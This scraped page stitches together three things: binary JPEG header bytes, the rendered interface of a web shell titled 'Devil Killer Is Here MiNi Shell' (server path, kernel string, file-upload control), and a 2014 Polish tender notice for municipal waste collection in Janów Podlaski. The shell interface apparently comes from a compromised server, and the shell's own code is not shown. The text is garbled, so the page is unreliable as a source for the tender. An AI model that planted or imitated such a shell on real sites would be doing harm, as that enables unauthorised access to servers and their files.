JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141017/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141017/347774-N-2014.html

<p class="kh_header"><b>Janów Podlaski: Odbiór i zagospodarowanie odpadów komunalnych z terenu 
Gminy Janów Podlaski</b><br>
<b>Numer ogłoszenia: 347774 - 2014; data zamieszczenia: 17.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Janów Podlaski , ul. Bialska 6a, 21-505 Janów Podlaski, woj. lubelskie, tel. 083 3413073, faks 0833413077.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.janowpodlaski.bip.lublin.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych z terenu 
Gminy Janów Podlaski.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa odbierania i zagospodarowania odpadów 
    komunalnych z terenu Gminy Janów Podlaski, powstających na nieruchomościach 
     zamieszkałych i w części niezamieszkałych przez mieszkańców.
     Zakres zamówienia obejmuje:
     1.1 odbiór i zagospodarowanie odpadów komunalnych  z nieruchomości zamieszkałych i w części niezamieszkałych,
          1) zmieszanych (nieselektywnie zbieranych),
          2) selektywnie zbieranych :
              a) szkło opakowanie,
              b) tworzyw sztucznych, plastiku w tym PET,
              c) drobnego metalu,
              d)  papieru i tektury,
              e) odpadów zielonych,
              f) budowlanych i rozbiórkowych powstałych w wyniku prowadzenia drobnych  robót nie wymagających pozwolenia na budowę ani zgłoszenia,
               g) ulegających biodegradacji,
               h) popiołu.
               i)  pozostałości z segregacji odpadów komunalnych tzw. frakcji resztkowej,
1.2  odbiór i zagospodarowanie odpadów komunalnych z Punktu Selektywnego Zbierania   
       Odpadów Komunalnych (PSZOK) inne odpady komunalne selektywnie zbierane, 
       nie wymienione w ust. 1 pkt. 2 z wyłączeniem akumulatorów,
1.3  wyposażenie właścicieli nieruchomości zamieszkałych na obszarze zabudowy 
       jednorodzinnej w worki foliowe wykonane z folii HDPE na odpady selektywnie zebrane : 
1)	60 l w kolorze szarym na popiół - (grubość folii - 0,06 mm, wymiar 600 x 800 mm),
2)	120 l w kolorze niebieskim na papier i tekturę - (grubość folii - 0,02 mm, wymiar - 700 x 1050 mm),
3)	120 l w kolorze białym na szkło opakowaniowe -  (grubość folii - 0,06 mm, wymiar - 700 x 1050 mm),
4)	120 l w kolorze żółtym na tworzywa sztuczne  -   (grubość folii - 0,02 mm,   wymiar - 700 x 1050 mm)
5)	120 l w kolorze zielonym na odpady zielone -  (grubość folii - 0,06 mm, wymiar - 700 x 1050 mm),
	     Worki powinny być opatrzone nadrukiem na jaki rodzaj odpadu są przeznaczone oraz muszą posiadać adres i dane kontaktowe Wykonawcy. 
Pierwszą partię worków po jednym dla każdej frakcji należy dostarczyć właścicielom nieruchomości w terminie do 20 dni od dnia obowiązywania umowy, następne zaś 
w ilości zgodnej z ilością odebranych worków w terminach odbioru odpadów wynikających z harmonogramu.
Pozostałości z segregacji odpadów komunalnych tzw. frakcja resztkowa odbierana będzie z pojemników.
1.4  Prowadzenie raz w tygodniu w sobotę w godz. 800  - 1500 Punktu Selektywnego Zbierania  Odpadów Komunalnych (PSZOK) zlokalizowanego na części międzygminnego  składowiska  odpadów komunalnych w miejscowości Janów Podlaski.
    Wykonawca na czas realizacji przedmiotu zamówienia zobowiązany jest własnym  staraniem i na własny koszt w ramach zaoferowanej ceny ofertowej wyposażyć PSZOK 
   w cztery  pojemniki V -1100 L do segregacji odpadów oraz utrzymywać pojemniki 
   w odpowiednim stanie sanitarnym i technicznym. 
2. Częstotliwość i zasady odbioru odpadów komunalnych. 
Odbiór odpadów komunalnych od właścicieli nieruchomości Wykonawca będzie realizował z częstotliwością i na zasadach określonych w obowiązującej na dzień podpisania umowy uchwale Rady Gminy Janów Podlaski w sprawie określenia szczegółowego sposobu i zakresu świadczonych usług  w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zagospodarowania tych odpadów w zamian za uiszczona opłatę za gospodarowanie odpadami komunalnymi Dz. Urz. Woj. Lub. z 2013 r. poz. 997:
1)	na obszarach o zabudowie jednorodzinnej:
a)	odpady zmieszane  -  dwa razy w miesiącu,
b)	odpady selektywnie zbierane:
	papier i tektura - raz na kwartał,
	tworzywa sztuczne i wielomateriałowe - raz na dwa miesiące,
	szkło opakowaniowe  - raz na dwa miesiące,
	budowlane i rozbiórkowe powstałe w wyniku prowadzenia drobnych robót niewymagających pozwolenia na budowę ani zgłoszenia - raz na dwa miesiące 
	ulegające biodegradacji - od maja do października raz w miesiącu, od listopada do lutego raz na dwa miesiące,
	popiół - raz w miesiącu od października do końca kwietnia
	pozostałości z segregacji odpadów komunalnych tzw. frakcji resztkowej - raz w miesiącu,
2)	na obszarze o zabudowie wielorodzinnej:
a)	odpady zmieszane -   dwa razy w miesiącu,
b)	odpady selektywnie zebrane:
	papier i tektura - raz na kwartał,
	tworzywa sztuczne i wielomateriałowe - raz na dwa miesiące,
	szkło opakowaniowe - raz na dwa miesiące,
	budowlane i rozbiórkowe powstałe w wyniku prowadzenia drobnych robót niewymagających pozwolenia na budowę ani zgłoszenia - raz na dwa miesiące - 
	ulegające biodegradacji - od maja do października raz w miesiącu, od listopada do lutego raz na dwa miesiące,
	pozostałości z segregacji odpadów komunalnych tzw. frakcji resztkowej - raz w miesiącu.
3)	Odbiór odpadów komunalnych Wykonawca będzie realizował w poszczególnych miejscowościach zawsze w ten sam roboczy dzień tygodnia. W sytuacji, gdy dzień odbioru odpadów jest ustawowo dniem wolnym od pracy (święto) odbiór odpadów nastąpi w dniu następnym po dniu wolnym od pracy.
4)	Odbiór odpadów zmieszanych oraz tzw. frakcji resztkowej będzie następował z pojemników (pojemniki zapewniają właściciele lub zarządcy nieruchomości) a selektywniezebranych z worków foliowych wystawionych przez właściciela na zewnątrz posesji, w miejscu zapewniającym swobodny dojazd specjalistycznym pojazdem.
Wykonawca w przypadku nieodebrania odpadów np. z powodu pomyłki w terminie odbioru przez mieszkańca zobowiązany jest do pozostawienia informacji o powodzie nieodebrania odpadów.
5)	Z nieruchomości o utrudnionym dojeździe (grząskie drogi gruntowe) Wykonawca 
w trakcie realizacji umowy w porozumieniu z Wójtem Gminy może ustalić odrębne terminy odbioru odpadów niż dla pozostałych nieruchomości z danej miejscowości.
6)	Wykonawca zobowiązany jest do ważenia wszystkich odebranych odpadów komunalnych na legalizowanej wadze samochodowej w miejscu przekazania odpadów komunalnych odebranych od właścicieli celem ich dalszego zagospodarowania.
7)	Zamawiający i Wykonawca wspólnie odpowiadają za informowanie mieszkańców
o zasadach  segregacji odpadów i terminach odbierania poszczególnych rodzajów odpadów. W tym celu Wykonawca w terminie 5 dni od daty obowiązywania umowy opracuje  zasady segregacji odpadów oraz sporządzi harmonogram odbioru odpadów, który po uzgodnieniu z Zamawiającym Zmawiający będzie publikował na swojej stronie internetowej www.janowpodlaski.bip.lublin.pl a Wykonawca w formie wydruków będzie zobowiązany przekazać właścicielom nieruchomości przed rozpoczęciem świadczenia  usługi będącej przedmiotem zamówienia.
8)	Zgodnie z art. 9 e ust. 2 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości 
i porządku w gminach  (Dz. U. z 2013 r., poz. 1399 z późn. zm.) - zakazuje się mieszania selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi odebranymi od właścicieli nieruchomości. Odbiór i transport odpadów zmieszanych i zebranych selektywnie nie może się odbywać jednocześnie na jeden środek transportowy.
3.        Kontrola obowiązku segregowania odpadów.
1)	Wykonawca zobowiązany jest do monitorowania ciążącego na właścicielu nieruchomości obowiązku segregowania odpadów komunalnych,
2)	Zgodnie z art. 9 f ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2013 r. poz.1399 z późn. zm.) - w przypadku niedopełnienia przez właściciela nieruchomości obowiązku w zakresie selektywnego zbierania odpadów komunalnych, Wykonawca zobowiązany jest do przyjmowania jako zmieszane odpady komunalne i powiadomienie w terminie 5 dni  o tym fakcie Zamawiającego. Zawiadomienie powinno zawierać dzień odbioru odpadów, miejscowość, ulicę i numer posesji oraz krótki opis.
3)	Wykonawca jest obowiązany do realizacji reklamacji ( np.: nieodebranie z nieruchomości odpadów zgodnie z harmonogramem, niedostarczenie worków na odpady zbierane w sposób selektywny itp.) w przeciągu 24 godzin od otrzymania od Zamawiającego zawiadomienia mailem lub telefonicznie. Wykonanie reklamacji należy niezwłocznie potwierdzić zamawiającemu w ten sam sposób.
4)	Szczegółowy wykaz adresów nieruchomości z których należy odbierać odpady komunalne Zamawiający przekaże Wykonawcy w dniu podpisania umowy. Wykaz będzie zawierał podział nieruchomości na których odpady będą zbierane w sposób selektywny oraz nieselektywny.

4.         Miejsce zagospodarowania odpadów.
1)	Wykonawca jest obowiązany do :
a)	przekazywania zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych dla Regionu Biała Podlaska przy ul. Ekologicznej 1 w Białej Podlaskiej lub w szczególnych przypadkach do instalacji zastępczej. W Regionie Biała Podlaska jest to składowisko odpadów komunalnych w Janowie Podlaskim.
b)	przekazywania selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów zgodnie z hierarchią postępowania 
z odpadami o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 r. o odpadach.
5.     Pozostałe obowiązki Wykonawcy.
1) Wykonawca obowiązany jest do przedkładania Zamawiającemu kwartalnych sprawozdań, zgodnie z wymogami określonymi w art. 9n ustawy z dnia 13 września 1996 r.  o utrzymaniu czystości i porządku w gminach(Dz. U. z 2013 r., poz. 1399 z późn. zm.).
2) Wykonawca podczas realizacji zamówienia obowiązany jest do przestrzegania przepisów prawa powszechnie obowiązującego oraz przepisów prawa lokalnego w tym: 
a)	ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21),
b)	ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2013 r., poz. 1399 z późn. zm.) wraz z aktami wykonawczymi,
c)	Planu Gospodarki Odpadami dla  województwa lubelskiego 2017 przyjętego uchwałą Nr XXIV-396-2012 Sejmiku Województwa Lubelskiego z dnia 30 lipca 2012 r.
d)	uchwały Nr XXIV-397-2012 Sejmiku Województwa Lubelskiego z dnia 30 lipca 2012 r. w sprawie wykonania Planu Gospodarki Odpadami dla województwa  lubelskiego 2017 (Dz. Urz. Woj. Lubelskiego z 2012 r., poz. 2590),
e)	uchwały  Nr XXVIII-479-2012 Sejmiku Województwa Lubelskiego z dnia 28 grudnia 2012 r. zmieniającej uchwałę w sprawie wykonania Planu Gospodarki Odpadami dla województwa lubelskiego 2017  (Dz. Urz. Woj. Lubelskiego z 2013 r. poz. 128),
f)	Regulaminu  utrzymania czystości i porządku na terenie Gminy Janów Podlaski przyjętego uchwałą Nr XIII-135-12 z dnia 28 grudnia 2012 r. (Dz. Urz. Woj. Lubelskiego z 2013 r. poz. 994),
g)	  uchwały Nr XIII-139-12 Rady Gminy Janów Podlaski z dnia 28 grudnia 2012 r.    w sprawie określenia szczegółowego sposobu i zakresu świadczenia usług w zakresie  odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowaniu   tych odpadów w zamian za uiszczoną opłatę za gospodarowanie odpadami komunalnymi  (Dz. Urz. Woj. Lubelskiego z 2013 r. poz. 997).
3) Wykonawca zobowiązany jest do osiągnięcia imieniu Zamawiającego   wymaganych przepisami prawa poziomów recyklingu, przygotowania do ponownego użycia i odzysku, oraz ograniczenia masy  odpadów ulegających biodegradacji  kierowanych na składowiska
4)  Wykonawca w ramach zamówienia obowiązany jest do przeprowadzenia zbiórki zużytego sprzętu elektrycznego i elektronicznego oraz zużytych opon bezpośrednio z nieruchomości zamieszkałych, przynajmniej raz w roku.
Szczegółowy termin zbiórki w poszczególnych miejscowościach oraz zasady zbiórki powinny być poprzedzone akcja informacyjną.
         Zbiórka polegać  będzie na: 
	załadunku na środek transportu odpadów wystawionych przed nieruchomość zamieszkałą,
	zagospodarowaniu odpadów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.31.00-7, 90.53.30.00-2, 90.51.20.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  żąda wniesienia wadium przed terminem składania ofert w wysokości  9 000, 00 zł. ( słownie : dziewięć tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiada zezwolenie na transport i zbieranie odpadów komunalnych zgodnie z wymogami ustawy o  
 odpadach. Ocena spełnienia warunku dokonana zostanie zgodnie z  formułą spełnia/ nie spełnia na podstawie przedstawionych dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest posiadanie wiedzy  i doświadczenia w realizacji w okresie ostatnich 3 lat przed   
       upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie  
       przynajmniej jednej usługi polegającej na zbieraniu  odpadów komunalnych z nieruchomości o 
       wartości minimum 200.000 zł. Ocena spełnienia warunku dokonana zostanie zgodnie z formułą 
       spełnia/ nie spełnia na podstawie przedstawionych dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest dysponowanie :
       a) co najmniej  dwoma samochodami przystosowanymi do odbierania zmieszanych 
           odpadów komunalnych,
       b) co najmniej dwoma samochodami przystosowanymi do odbierania selektywnie
           zebranych odpadów komunalnych,
       c) co najmniej jednym pojazdem do odbierania odpadów bez funkcji kompaktującej .  

            Pojazdy do odbioru odpadów muszą spełniać wymagania określone w rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r., poz. 122 z późn. zm.).
        d)  bazą magazynowo - transportową usytuowaną na terenie gminy Janów Podlaski lub w odległości 
             nie większej niż 60 km od granicy gminy.
Baza magazynowo - transportowa powinna spełniać wymagania o których mowa w rozporządzeniu Ministra Środowiska z dnia 11  stycznia 2013 r. w sprawie szczegółowych wymagań odbierania odpadów komunalnych od właścicieli nieruchomości  (Dz. U. z 2013 r., poz. 122 z późn. zm.).
              Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia/ nie spełnia
              na podstawie przedstawionych dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest dysponowanie środkami finansowymi lub zdolnością kredytową na kwotę nie 
       mniejszą niż 200.000 złotych. Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia/ 
       nie spełnia na podstawie przedstawionych dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do reprezentowania Wykonawcy/Wykonawców  ubiegających się o udzielenie zamówienia - jeżeli dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.janowpodlaski.bip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać pod adresem: Urząd Gminy, ul. Bialska 6a. pok. 4, 21-505 Janów Podlaski..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2014 godzina 10:00, miejsce: Urząd Gminy Janów Podlaski ul. Bialska 6a, pok. 104 ( sekretariat) 21-505 Janów Podlaski..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
